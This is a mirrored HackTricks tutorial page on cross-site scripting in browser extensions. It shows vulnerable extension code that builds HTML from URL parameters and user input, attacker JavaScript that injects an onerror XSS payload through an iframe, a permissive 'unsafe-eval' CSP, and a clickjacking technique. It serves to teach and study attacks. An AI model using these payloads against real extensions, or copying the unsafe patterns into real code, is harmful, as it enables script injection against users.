mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
134 lines
7.3 KiB
Markdown
134 lines
7.3 KiB
Markdown
# BrowExt - XSS Example
|
||
|
||
<details>
|
||
|
||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Other ways to support HackTricks:
|
||
|
||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
|
||
## Cross-Site Scripting (XSS) through Iframe
|
||
|
||
In this setup, a **content script** is implemented to instantiate an Iframe, incorporating a URL with query parameters as the source of the Iframe:
|
||
|
||
```javascript
|
||
chrome.storage.local.get("message", result => {
|
||
let constructedURL = chrome.runtime.getURL("message.html") +
|
||
"?content=" + encodeURIComponent(result.message) +
|
||
"&redirect=https://example.net/details";
|
||
frame.src = constructedURL;
|
||
});
|
||
```
|
||
|
||
A publicly accessible HTML page, **`message.html`**, is designed to dynamically add content to the document body based on the parameters in the URL:
|
||
|
||
```javascript
|
||
$(document).ready(() => {
|
||
let urlParams = new URLSearchParams(window.location.search);
|
||
let userContent = urlParams.get("content");
|
||
$(document.body).html(`${userContent} <button id='detailBtn'>Details</button>`);
|
||
$('#detailBtn').on('click', () => {
|
||
let destinationURL = urlParams.get("redirect");
|
||
chrome.tabs.create({ url: destinationURL });
|
||
});
|
||
});
|
||
```
|
||
|
||
A malicious script is executed on an adversary's page, modifying the `content` parameter of the Iframe's source to introduce a **XSS payload**. This is achieved by updating the Iframe's source to include a harmful script:
|
||
|
||
```javascript
|
||
setTimeout(() => {
|
||
let targetFrame = document.querySelector("iframe").src;
|
||
let baseURL = targetFrame.split('?')[0];
|
||
let xssPayload = "<img src='invalid' onerror='alert(\"XSS\")'>";
|
||
let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`;
|
||
|
||
document.querySelector("iframe").src = maliciousURL;
|
||
}, 1000);
|
||
```
|
||
|
||
An overly permissive Content Security Policy such as:
|
||
|
||
```json
|
||
"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';"
|
||
```
|
||
|
||
allows the execution of JavaScript, making the system vulnerable to XSS attacks.
|
||
|
||
An alternative approach to provoke the XSS involves creating an Iframe element and setting its source to include the harmful script as the `content` parameter:
|
||
|
||
```javascript
|
||
let newFrame = document.createElement("iframe");
|
||
newFrame.src = "chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?content=" +
|
||
encodeURIComponent("<img src='x' onerror='alert(\"XSS\")'>");
|
||
document.body.append(newFrame);
|
||
```
|
||
|
||
## DOM-based XSS + ClickJacking
|
||
|
||
This example was taken from the [original post writeup](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/).
|
||
|
||
The core issue arises from a DOM-based Cross-site Scripting (XSS) vulnerability located in **`/html/bookmarks.html`**. The problematic JavaScript, part of **`bookmarks.js`**, is detailed below:
|
||
|
||
```javascript
|
||
$('#btAdd').on('click', function() {
|
||
var bookmarkName = $('#txtName').val();
|
||
if ($('.custom-button .label').filter(function() {
|
||
return $(this).text() === bookmarkName;
|
||
}).length) return false;
|
||
|
||
var bookmarkItem = $('<div class="custom-button">');
|
||
bookmarkItem.html('<span class="label">' + bookmarkName + '</span>');
|
||
bookmarkItem.append('<button class="remove-btn" title="delete">x</button>');
|
||
bookmarkItem.attr('data-title', bookmarkName);
|
||
bookmarkItem.data('timestamp', (new Date().getTime()));
|
||
$('section.bookmark-container .existing-items').append(bookmarkItem);
|
||
persistData();
|
||
});
|
||
```
|
||
|
||
This snippet fetches the **value** from the **`txtName`** input field and uses **string concatenation to generate HTML**, which is then appended to the DOM using jQuery’s `.append()` function.
|
||
|
||
Typically, the Chrome extension's Content Security Policy (CSP) would prevent such vulnerabilities. However, due to **CSP relaxation with ‘unsafe-eval’** and the use of jQuery’s DOM manipulation methods (which employ [`globalEval()`](https://api.jquery.com/jquery.globaleval/) to pass scripts to [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) upon DOM insertion), exploitation is still possible.
|
||
|
||
While this vulnerability is significant, its exploitation is usually contingent on user interaction: visiting the page, entering an XSS payload, and activating the “Add” button.
|
||
|
||
To enhance this vulnerability, a secondary **clickjacking** vulnerability is exploited. The Chrome extension's manifest showcases an extensive `web_accessible_resources` policy:
|
||
|
||
```json
|
||
"web_accessible_resources": [
|
||
"html/bookmarks.html",
|
||
"dist/*",
|
||
"assets/*",
|
||
"font/*",
|
||
[...]
|
||
],
|
||
```
|
||
|
||
Notably, the **`/html/bookmarks.html`** page is prone to framing, thus vulnerable to **clickjacking**. This vulnerability is leveraged to frame the page within an attacker’s site, overlaying it with DOM elements to redesign the interface deceptively. This manipulation leads victims to interact with the underlying extension unintentionally.
|
||
|
||
## References
|
||
|
||
* [https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/](https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/)
|
||
* [https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)
|
||
|
||
<details>
|
||
|
||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Other ways to support HackTricks:
|
||
|
||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|